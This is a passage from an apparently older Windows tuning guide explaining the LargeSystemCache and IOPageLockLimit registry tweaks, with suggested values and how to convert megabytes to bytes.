key, set the value from 0 to 1 to enable. Note that in doing this, you are consuming more of your system RAM than normal. While LargeSystemCache will cut back usage when other apps need more RAM, this process can impede performance in certain intensive situations. According to Microsoft, the “[0] setting is recommended for servers running applications that do their own memory caching, such as Microsoft SQL Server, and for applications that perform best with ample memory, such as Internet Information Services.” IOPageLockLimit – This tweak is of questionable value to people that aren’t running some kind of server off of their computer, but we will include it anyway. This tweak boosts the Input/Output performance of your computer when it is doing a large amount of file transfers and other similar operations. This tweak won’t do much of anything for a system without a significant amount of RAM (if you don’t have more than 128 MB, don’t even bother), but systems with more than 128 MB of RAM will generally find a performance boost by setting this to between 8 and 16 MB. The default is 0.5 MB, or 512 KB. This setting requires a value in bytes, so multiply the desired number of megabytes * 1024 * 1024. That’s X * 1048576 (where X is the number, in megabytes). Test out several settings and keep the one which seems to work best for your system. Finished on